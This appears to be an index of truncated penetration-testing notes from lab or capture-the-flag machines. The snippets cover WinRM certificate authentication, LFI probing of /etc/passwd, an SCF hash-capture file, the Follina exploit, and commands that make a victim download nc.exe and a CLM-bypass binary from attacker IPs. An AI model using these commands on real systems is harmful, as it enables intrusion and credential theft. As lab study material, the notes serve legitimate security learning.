Host entries 10.10.10.203 N/A If Active Directory => Synchronize your NTP with the domain controller: nptdate 10.10.10.103 Content SVN - Subversion Enumeration Information Leakage VHos...

WINRM Certificate We can authenticate via WINRM by creating a certificate, this is an AD CS feature. As we can check on this notes all we need to do is follow this steps: Pre-requisites: Access...

Upload Netcat execution for windows. From victim machine: curl http://10.10.16.4/nc.exe -o nc.exe Examples: [[StreamIO#^40a776]] Network File System through SMB First create with impacket the se...

iwr (Invoke-Web-Request) Transfer a file with the following command: PS> iwr -uri http://10.10.14.4/PsBypassCLM.exe -OutFile PsBypassCLM.exe Execute this commands to create wget.ps1 on victim m...

Identify the hash type If you want to know the type of a password’s hash you can run the following command on your machine: hashcat.exe -j -m hash.txt And it will throw the type: Hash-mode was not...

SCF Attack SCF Attack First we need to write a file inside the share with writting permissions: (root㉿kali)-[/mnt/tempMount/Users/Public] └─# cat test.scf [Shell] Command=2 IconFile=\\10.10.14.4\...

Simple LFI If an input is accepted on a URL parameter we can try to access any system file and check if whether or not it retrieves the file: http://10.11.1.35/section.php?page=/etc/passwd http://1...

Redirect traffic to TCP localhost port We can redirect the websocket traffic to a TCP localhost port so we can interact with it as if it were an HTTP port: from http.server import SimpleHTTPRequest...

Swaks is a featureful, flexible, scriptable, transaction-oriented SMTP test tool. Features include: SMTP extensions including TLS, authentication, pipelining, PROXY, PRDR, and XCLIENT Protoco...

The following exploit Follina works pretty well, all you need to do is clone the repository and execute it as follows, the “-c” is the command to execute, it can be a cmd or a powershell intruction...